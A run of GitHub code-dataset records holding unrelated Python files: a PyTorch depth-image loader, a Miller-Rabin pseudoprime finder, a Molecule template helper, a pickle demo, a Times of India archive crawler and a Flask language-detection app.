img.copy()\n img.thumbnail(thumbnail_size, Image.LANCZOS)\n padded = Image.new(img.mode, thumbnail_size)\n padded.paste(img,\n ((padded.size[0] - img.size[0]) // 2,\n (padded.size[1] - img.size[1]) // 2))\n return padded\n\n def depth_thumbnail(self, thumbnail_size):\n return MiniRGBD._thumbnail(self._depth, thumbnail_size)\n\n def rgb_thumbnail(self, thumbnail_size):\n return MiniRGBD._thumbnail(self._rgb, thumbnail_size)\n\n def point_cloud(self):\n z = np.asarray(Image.open(self._depth_file))\n\n # From depth_to_3D.py\n # camera calibration used for generation of depth\n fx = 588.67905803875317\n fy = 590.25690113005601\n cx = 322.22048191353628\n cy = 237.46785983766890\n\n # create tuple containing image indices\n indices = tuple(np.mgrid[:z.shape[0], :z.shape[1]].reshape((2, -1)))\n pts3D = np.zeros((indices[0].size, 3))\n pts3D[:, 2] = z[indices].ravel() / 1000.\n pts3D[:, 0] = (np.asarray(indices).T[:, 1] - cx) * pts3D[:, 2] / fx\n pts3D[:, 1] = (np.asarray(indices).T[:, 0] - cy) * pts3D[:, 2] / fy\n\n return pts3D\n\n\nclass MiniDDataset(torch.utils.data.Dataset):\n def __init__(self, mini_rgbd, thumbnail_size=(128, 128)):\n self.mini_rgbd = mini_rgbd\n self.thumbnail_size = thumbnail_size\n\n def __getitem__(self, index):\n rgbd = self.mini_rgbd[index]\n # Currently return depth image with 2d joints\n img = rgbd.depth_thumbnail(self.thumbnail_size)\n target = rgbd.joints_2d\n return img, target\n\n def __len__(self):\n return len(self.minirgbd)\n\n\n\ndef find_mini_rgbd(path):\n datafiles = []\n # Find all data files, given as (path, XXXXX):(str,str), where XXXXX is the number of the image, e.g. syn_XXXXX.png.\n with os.scandir(path) as it:\n for entry in it:\n # Get directories /XX/\n if entry.is_dir() and entry.name.isdigit():\n for file in os.listdir(os.path.join(entry, 'rgb')):\n if file.startswith('syn_') and file.endswith(\".png\") and file[4:9].isdigit():\n datafiles.append((entry.path, file[4:9]))\n return datafiles\n\n\ndef load_mini_rgbd(datafiles):\n # Since we max out the CPU, we lower our priority so the system does not become unresponsive.\n parent = psutil.Process()\n old_priority = parent.nice()\n parent.nice(psutil.BELOW_NORMAL_PRIORITY_CLASS) # (Child processes inherit the niceness value)\n\n # Using multiple CPUs since each can handle a separate file. (Task is CPU-bound on SSD)\n with ProcessPoolExecutor(max_workers=os.cpu_count()) as pool:\n datafiles = pool.map(MiniRGBD, datafiles, chunksize=64)\n parent.nice(old_priority) # Restore process priority.\n sys.stdout.flush() # TODO: Remove this\n return [data for data in datafiles]\n\nimport matplotlib.animation as animation\n\nif __name__ == \"__main__\":\n data_files = find_mini_rgbd(os.path.join('RGBD', 'MINI-RGBD'))\n data_files = load_mini_rgbd(data_files[:2])\n # Now that we have the data (80 seconds load)\n fig, ax = plt.subplots()\n ims = []\n for (img, target) in MiniDDataset(data_files):\n im = plt.imshow(img, animated=True)\n ims.append([im])\n\n ani = animation.ArtistAnimation(fig, ims, interval=1000//30, blit=True,\n repeat_delay=0)\n plt.show()\n\n sys.exit()\n for file in os.listdir(os.path.join('RGBD', 'MINI-RGBD', '01', 'rgb')):\n assert (file.startswith('syn_') and file.endswith(\".png\")) # Check right format.\n int(file[4:9])\n\n sys.exit()\n if file.endswith(\".png\"):\n rgb = Image.open(os.path.join(rgb_dir, file.replace('mask', 'syn')))\n depth = Image.open(os.path.join(depth_dir, file.replace('mask', 'syn').replace('.png', '_depth.png')))\n fg = Image.open(os.path.join(fg_mask_dir, file))\n # Extract foreground and crop to it.\n fgbox = fg.getbbox()\n cropped_depth = Image.composite(depth, Image.new(depth.mode, depth.size), fg).crop(fgbox)\n cropped_rgb = Image.composite(rgb, Image.new(rgb.mode, rgb.size), fg).crop(fgbox)\n\n depth_range = depth.getextrema()\n assert (depth_range[0] != 0)\n\n if not cropped_depth.getbbox() == cropped_rgb.getbbox():\n print(cropped_depth.getbbox() == cropped_rgb.getbbox())\n sys.exit()\n # Resize the image, preserving aspect ratio and pad it out, so it is the same as thumbnail_size\n # cropped.thumbnail(thumbnail_size, Image.LANCZOS)\n # padded = Image.new(cropped.mode, thumbnail_size)\n # padded.paste(cropped,\n # (int((thumbnail_size[0] - cropped.size[0]) / 2),\n # int((thumbnail_size[1] - cropped.size[1]) / 2)))\n\n # Make sure image is square (stackoverflow.com/questions/1386352/pil-thumbnail-and-end-up-with-a-square-image)\n # background.save(\"output.png\")\n\n # rgb.crop(foreground.getbbox())\n sys.exit()\n\n #print([test._bbox for test in datafiles])\n\n#with concurrent.futures.ProcessPoolExecutor() as executor:\n# datafiles = executor.starmap(MiniRGBD, datafiles)\n\n# Store them as a dataset.\n#data_files = [MiniRGBD(dir, num) for (dir, num) in datafiles]\n\n\n\n\n\n\n\n\n\n\n#with open(path, 'rb') as f:", "repo_name": "sebftw/PyTorch", "sub_path": "mini-rgbd.py", "file_name": "mini-rgbd.py", "file_ext": "py", "file_size_in_byte": 8314, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 46, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 46, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 47, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 53, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 80, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 80, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.mgrid", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.utils.data.utils", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 113, "usage_type": "name"}, {"api_name": "os.scandir", "line_number": 133, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "psutil.Process", "line_number": 145, "usage_type": "call"}, {"api_name": "psutil.BELOW_NORMAL_PRIORITY_CLASS", "line_number": 147, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 150, "usage_type": "call"}, {"api_name": "os.cpu_count", "line_number": 150, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 153, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.animation.ArtistAnimation", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 172, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 177, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 179, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 179, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 180, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 181, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 181, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PIL.Image.composite", "line_number": 184, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 184, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 184, "usage_type": "call"}, {"api_name": "PIL.Image.composite", "line_number": 185, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 185, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 185, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 192, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "33413634905", "text": "\"\"\"\r\nA python script to perform Miller-Rabin Primality Test and find the strong \r\npseudo primes base 2 up to 10^5.\r\n\r\nNOTE : A python package \"sympy\" is used so please install the package.\r\n\t Steps to import the package : 1. Open command prompt or terminal\r\n\t \t\t\t\t\t\t\t\t 2. run \"pip install sympy\"\r\n\r\nThis program is written using Python Version 3\r\n________________________________________________________________________________\r\n\r\n\"\"\"\r\nimport random \r\nimport sympy\r\n\r\nlower = 2 #first number to be tested for prime\r\nupper = pow(10,5) #last number to be tested for prime ie 10^5\r\nk = 4 #number of iteration to be performed\r\n\r\nprime_list = sympy.primerange(lower,upper) # a list of all prime betn 3 and 10^5\r\n\r\nprime_set = set() # a set to hold all primes\r\n\r\n#adding all prime to a set\r\nfor i in prime_list:\r\n\tprime_set.add(i)\r\n \r\n# a function to cal (x^y) % p \r\ndef power(x, y, p): \r\n\t\r\n\tres = 1; # variable to store (x^y) % p \r\n\t\r\n\t# Update x if it is more than or \r\n\t# equal to p \r\n\tx = x % p; \r\n\twhile (y > 0): \r\n\t\t\r\n\t\t# If y is odd, multiply \r\n\t\t# x with result \r\n\t\tif (y & 1): \r\n\t\t\tres = (res * x) % p; #mod operation to keep x in range of p\r\n\t\ty = y>>1; # y = y/2 \r\n\t\tx = (x * x) % p; #mod operation to keep x in range of p\r\n\t\r\n\treturn res; \r\n\r\n#a functio which compute the algo of Raben Miller Test\r\ndef millerTest(d, n): \r\n\t\r\n\ta = 2; # base\r\n\r\n\t# Compute a^d % n \r\n\tx = power(a, d, n); \r\n\r\n\t# if x is 1 or n-1 ie -1 return true\r\n\tif (x == 1 or x == n - 1): \r\n\t\treturn True; \r\n\r\n\t# Iterating\r\n\t# (i) d does not reach n-1 \r\n\t# (ii) (x^2) % n is not 1 \r\n\t# (iii) (x^2) % n is not n-1 \r\n\twhile (d != n - 1): \r\n\t\tx = (x * x) % n; \r\n\t\td *= 2; \r\n\r\n\t\tif (x == 1):\r\n\t\t\t#if x = 1 the n is composite prime \r\n\t\t\treturn False; \r\n\t\tif (x == n - 1): \r\n\t\t\t#if x = n-1 ie -1 then n is probable prime\r\n\t\t\treturn True; \r\n\r\n\t# Return composite \r\n\treturn False; \r\n\r\n# It returns false if n is composite and returns true if n is probably prime. \r\ndef isPrime( n, k): \r\n\t\r\n\t# bottleneck cases \r\n\tif (n <= 1 or n == 4): \r\n\t\treturn False; \r\n\tif (n <= 3): \r\n\t\treturn True; \r\n\r\n\t# Find r such that n = 2^d * r + 1 for some r >= 1 \r\n\td = n - 1; \r\n\twhile (d % 2 == 0): \r\n\t\td //= 2; \r\n\r\n\t# Iterate given nber of 'k' times \r\n\tfor i in range(k): \r\n\t\tif (millerTest(d, n) == False): \r\n\t\t\treturn False; \r\n\r\n\treturn True; \r\n\r\n# Number of iterations for accuracy\r\nk = 4; \r\n\r\nmiller_primes = set()\r\n\r\n# Checking all number for probable prime by Rabin Miller Test\r\nfor n in range(1,100000): \r\n\tif (isPrime(n, k)): \r\n\t\tmiller_primes.add(n)\r\n\r\n#Set subtraction betn miller's primes and real primes\r\npseudoprimes = miller_primes - prime_set\r\n\r\nprint(\"PSEUDOPRIMES : {}\".format(pseudoprimes))\r\n", "repo_name": "ArvindOkram/Attacks-and-Cryptography-Algorithms", "sub_path": "Cryptography Algorithms Implementation/Raben Milleer.py", "file_name": "Raben Milleer.py", "file_ext": "py", "file_size_in_byte": 2664, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sympy.primerange", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "29383923321", "text": "import abc\nimport os\n\nimport cookiecutter\nimport cookiecutter.main\n\nfrom molecule import logger\n\nLOG = logger.get_logger(__name__)\n\n\nclass Base(object):\n __metaclass__ = abc.ABCMeta\n\n def _process_templates(self,\n template_dir,\n extra_context,\n output_dir,\n overwrite=True):\n \"\"\"\n Process templates as found in the named directory.\n\n :param template_dir: A string containing an absolute or relative path\n to a directory where the templates are located. If the provided\n directory is a relative path, it is resolved using a known location.\n :param extra_context: A dict of values that are used to override\n default or user specified values.\n :param output_dir: An string with an absolute path to a directory where\n the templates should be written to.\n :param overwrite: An optional bool whether or not to overwrite existing\n templates.\n :return: None\n \"\"\"\n template_dir = self._resolve_template_dir(template_dir)\n\n cookiecutter.main.cookiecutter(\n template_dir,\n extra_context=extra_context,\n output_dir=output_dir,\n overwrite_if_exists=overwrite,\n no_input=True,\n )\n\n def _resolve_template_dir(self, template_dir):\n if not os.path.isabs(template_dir):\n template_dir = os.path.join(\n os.path.dirname(__file__), os.path.pardir, os.path.pardir,\n 'cookiecutter', template_dir)\n\n return template_dir\n", "repo_name": "amitvashist7/ansible-development-CTS", "sub_path": "molecule/my_env/lib/python2.7/site-packages/molecule/command/init/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 1635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "molecule.logger.get_logger", "line_number": 9, "usage_type": "call"}, {"api_name": "molecule.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cookiecutter.main.cookiecutter", "line_number": 36, "usage_type": "call"}, {"api_name": "cookiecutter.main", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}]} +{"seq_id": "4876444349", "text": "#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n'''\n\n@File : use_pickle.py \n@Author : jiachen.zou@jiiov.com \n@Date : 2021-03-31 11:27 CST(+0800) \n@Brief : \n\n'''\n\nimport pickle\nfrom io import BytesIO\n\nclass MyData:\n def __init__( self, data):\n self.data = data\n def who_am_i( self):\n print( self, self.data)\n\nobj = MyData( 456)\nobj.who_am_i()\n\n# Serialize:\nfile = BytesIO()\npickle.dump( obj, file)\nprint( 'serialized into %d bytes:' % ( len( file.getvalue())))\nprint( \" \".join( \"%02x\" % byte for byte in bytes( file.getvalue())))\n\n# Unserialize\nprint( 'unserialized:')\nfile.seek( 0)\nnew_obj = pickle.load( file)\nnew_obj.who_am_i()\n\n\n\n# End of 'use_pickle.py' \n\n", "repo_name": "alexander-zou/pycheats", "sub_path": "pyps/use_pickle.py", "file_name": "use_pickle.py", "file_ext": "py", "file_size_in_byte": 692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "io.BytesIO", "line_number": 26, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 27, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "28839354402", "text": "# use for lang - en,hi,mr\nimport pandas as pd\nimport config\nimport time\nimport os\nimport calendar\nfrom pathlib import Path\nfrom argparse import ArgumentParser\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nlang_dict = {'en':'english','hi':'hindi','kn':'kannada','te':'telugu','ml':'malayalam','ta':'tamil','mr':'marathi'}\n\ndef create_directory(path):\n\ttry:\n\t\tPath(path).mkdir(parents=True, exist_ok=True)\n\t\treturn True\n\texcept FileExistsError as fe_error:\n\t\treturn True\n\texcept OSError as error:\n\t\tprint(error)\n\treturn False\n\n\ndef get_driver(web_browser=\"chrome\"):\n\tif web_browser == \"chrome\":\n\n\t\toptions = webdriver.chrome.options.Options()\n\t\toptions.add_argument(\"--headless\")\n\t\toptions.add_argument(\"--disable-application-cache\")\n\t\toptions.add_argument(\"--disable-extensions\")\n\t\toptions.add_argument(\"--start-maximized\")\n\t\toptions.add_argument(\"--log-level=3\")\n\t\tprefs = {\n\t\t\t\"profile.password_manager_enabled\": False,\n\t\t\t\"credentials_enable_service\": False,\n\t\t}\n\t\toptions.add_experimental_option(\"prefs\", prefs)\n\t\toptions.add_experimental_option(\n\t\t\t\"excludeSwitches\", [\"load-extension\", \"enable-automation\", \"enable-logging\"]\n\t\t)\n\t\tdriver = webdriver.Chrome(config.CHROME_DRIVER_PATH, options=options)\n\t\treturn driver\n\telse:\n\t\tprint(\"Currently only support chrome driver\")\n\t\treturn None\n\ndef link_prepare(lang,month,year,archivelist=False):\n\n\tmonth_code=time.strptime(month,'%B').tm_mon\n\tmonth_code=\"{:02d}\".format(month_code)\n\n\tlink=\"\"\n\tif lang==\"en\":\n\t\tlink+=\"https://timesofindia.indiatimes.com/archive/year-\"+year+\",month-\"+month_code+\".cms\"\n\tif lang==\"mr\":\n\t\tlink+=\"https://maharashtratimes.com/archive.cms?year=\"+year+\"&month=\"+month_code\n\tif lang==\"hi\":\n\t\tlink+=\"https://navbharattimes.indiatimes.com/archive/year-\"+year+\",month-\"+month_code+\".cms\"\n\tif archivelist==True:\n\t\tif lang!= 'mr':\n\t\t\tlink=link[:-4]\n\t\tlink=link.replace('archive','archivelist')\n\t\tif lang=='mr' :\n\t\t\tlink+=\"&starttime=\"\n\t\telse:\n\t\t\tlink+=\",starttime-\"\n\treturn link\n\ndef first_count(link,lang):\n\tif lang == 'mr' :\n\t\tfc=link.split('=')\n\t\tfc=fc[-1]\n\telse :\n\t\tfc=link.split('-')\n\t\tfc=fc[-1]\n\t\tfc=fc[:-4]\n\treturn int(fc)\n\ndef xpath(lang):\n\tif lang == 'en':\n\t\treturn \"/html/body/div[1]/table[2]/tbody/tr[2]/td[1]//a\"\n\tif lang == 'mr':\n\t\treturn \"//div[@class='leftmain']//a\"\n\tif lang == 'hi':\n\t\treturn \"//div[@class='normtxt']//a\"\n\ndef write_link_month(lang,year, month, driver, out_dir,log): \n\n\tlink=link_prepare(lang,month,year)\n\n\tmonth_code=time.strptime(month,'%B').tm_mon\n\tmonth_code=\"{:02d}\".format(month_code)\n\tlast_date= calendar.monthrange(int(year),int(month_code))[1]\n\n\tdriver.get(link)\n\ttime.sleep(3)\n\tentries = driver.find_elements_by_xpath(\"//table[@id='calender']//a\")\n\tfirst_link=\"\"\n\tfor ent in entries:\n\t\tif ent.text == '1':\n\t\t\tfirst_link=ent.get_attribute('href')\n\t\t\tbreak\n\tcount=first_count(first_link,lang)\n\n\tdata_table = pd.DataFrame(columns=[\"Headline\",\"Datetime\", \"Link\"])\n\n\tif log : print(\"\\n----------------\",year, month, lang_dict[lang],\"----------------\\n\")\n\n\tfor day in range(1,last_date+1):\n\t\tday=\"{:02d}\".format(day)\n\t\tdate= str(year) + \"/\" + str(month_code) + \"/\" + str(day)\n\t\tday_link = link_prepare(lang,month,year,archivelist=True)+str(count)+\".cms\"\n\t\tif lang==\"mr\":\n\t\t\tday_link=day_link[:-4]\n\n\t\tdriver.get(day_link)\n\t\t#time.sleep(3)\n\t\tentries = driver.find_elements_by_xpath(xpath(lang))\n\n\t\tif log : print(f\"{date} - {len(entries)} entries ... \",end='')\n\t\t\n\t\tfor ent in entries :\n\t\t\theadline = ent.text\n\t\t\t#/html/body/div[6]/div[11]/div[1]/div[3]/table/tbody/tr[1]/td[1]/span/a[1]\n\t\t\t#en-/html/body/div[1]/table[2]/tbody/tr[2]/td[1]\n\t\t\t#mr-/html/body/div[6]/div[11]/div[1]/div[3]/table/tbody/tr[1]\n\t\t\t#hi-/html/body/div[6]/div[8]/div[1]/table/tbody/tr[2]\n\t\t\thlink = ent.get_attribute(\"href\")\n\t\t\tdata_table = data_table.append({\"Headline\": headline,\"Datetime\": date ,\"Link\": hlink},ignore_index=True,)\n\n\t\tif log : print(\"Appended Successfully\")\n\t\tcount+=1\n\tif not os.path.exists(out_dir):\n\t\tcreate_directory(out_dir)\n\tdata_table.drop_duplicates(subset=[\"Link\"], inplace=True)\n\tdata_table.to_csv(\n\t\tos.path.join(out_dir, f\"TOI_{lang_dict[lang]}_{month.lower()}_{year}.csv\"),\n\t\tencoding=config.CSV_FILE_ENCODING,\n\t\tindex=False,\n\t)\n\tprint(f\"\\nFile TOI_{lang_dict[lang]}_{month.lower()}_{year}.csv is committed with {data_table.shape[0]} entries. \\n\")\n\treturn\n\n\n\n\ndef main():\n\tparser = ArgumentParser()\n\tparser.add_argument(\"--log\", help=\"will print log\",action=\"store_true\")\n\tparser.add_argument(\"--output-dir\", help=\"output directory\", type=str, default=\"\")\n\tparser.add_argument(\"--lang-code\", help=\"Language Code - mr,hi,en\", type=str, required=True)\n\tparser.add_argument(\"--year\", help=\"Year in YYYY format\", type=str, required=True)\n\tparser.add_argument(\"--month\", help=\"Month \", type=str, required=True)\n\targs = parser.parse_args()\n\tlog=args.log\n\tn_lang=args.lang_code\n\tn_year=args.year\n\tpass_month=args.month\n\tsave_csv_dir = args.output_dir\n\tif len(save_csv_dir)==0 : save_csv_dir=\"article_list/\"+str(n_year)+\"/\"+str(pass_month)+\" \"+str(n_year)+\"/\"\n\tdriver = get_driver()\n\twrite_link_month(n_lang,n_year, pass_month, driver, save_csv_dir,log) \n\tdriver.close()\n\tdriver.quit()\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "project-anuvaad/anuvaad-corpus-tools", "sub_path": "timesofindia-crawler/generate_article_list.py", "file_name": "generate_article_list.py", "file_ext": "py", "file_size_in_byte": 5373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 32, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 46, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 46, "usage_type": "name"}, {"api_name": "config.CHROME_DRIVER_PATH", "line_number": 46, "usage_type": "attribute"}, {"api_name": "time.strptime", "line_number": 54, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 96, "usage_type": "call"}, {"api_name": "calendar.monthrange", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "config.CSV_FILE_ENCODING", "line_number": 143, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 153, "usage_type": "call"}]} +{"seq_id": "536269170", "text": "import re\nimport pickle\nfrom flask import Flask, request, jsonify, render_template\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\n# Load the dataset\nlanguage = pd.read_csv('Language Detection.csv')\n\n# Preprocess the text data\nX = language[\"Text\"]\ny = language[\"Language\"]\nle = LabelEncoder()\ny = le.fit_transform(y)\ntext_list = []\nfor text in X:\n text = re.sub(r'[!@#$(),n\"%^*?:;~`0-9]', ' ', text)\n text = re.sub(r'[[]]', ' ', text)\n text = text.lower()\n text_list.append(text)\n\n# Vectorize the text data\ncv = CountVectorizer()\nX = cv.fit_transform(text_list).toarray()\n\n# Split the data into train and test sets\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size = 0.20)\n\n# Train the model\nmodel = MultinomialNB()\nmodel.fit(x_train, y_train)\n\n# Predict on the test set and calculate accuracy\ny_prediction = model.predict(x_test)\naccuracy = accuracy_score(y_test, y_prediction)\nconfusion_m = confusion_matrix(y_test, y_prediction)\nprint(\"The accuracy is :\",accuracy)\n\n# Save the model and vectorizer to disk\npickle.dump(model, open(\"model.pkl\", \"wb\"))\npickle.dump(cv, open(\"vectorizer.pkl\", \"wb\"))\n\n# Load the model and vectorizer in the Flask app\napp = Flask(__name__)\nmodel = pickle.load(open('model.pkl', 'rb'))\ncv = pickle.load(open('vectorizer.pkl', 'rb'))\n\n# Define the predict function\n@app.route('/predict',methods=['POST'])\ndef predict():\n # Get the text from the POST request\n text = request.json['text']\n \n # Preprocess the text\n text = re.sub(r'[!@#$(),n\"%^*?:;~`0-9]', ' ', text)\n text = re.sub(r'[[]]', ' ', text)\n text = text.lower()\n \n # Vectorize the text\n text_vectorized = cv.transform([text]).toarray()\n \n # Make the prediction\n prediction = model.predict(text_vectorized)\n \n # Reverse the label encoding\n predicted_language = le.inverse_transform(prediction)[0]\n \n # Return the predicted language\n return jsonify({'language': predicted_language})\n\n# Define the home page\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n# Run the app\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "Avdhoot-Santosh-Sawant/Machine-Learning-Language-Identification-Project", "sub_path": "language detection ml project/app2.py", "file_name": "app2.py", "file_ext": "py", "file_size_in_byte": 2393, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 17, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 44, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 48, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "40611375372", "text": 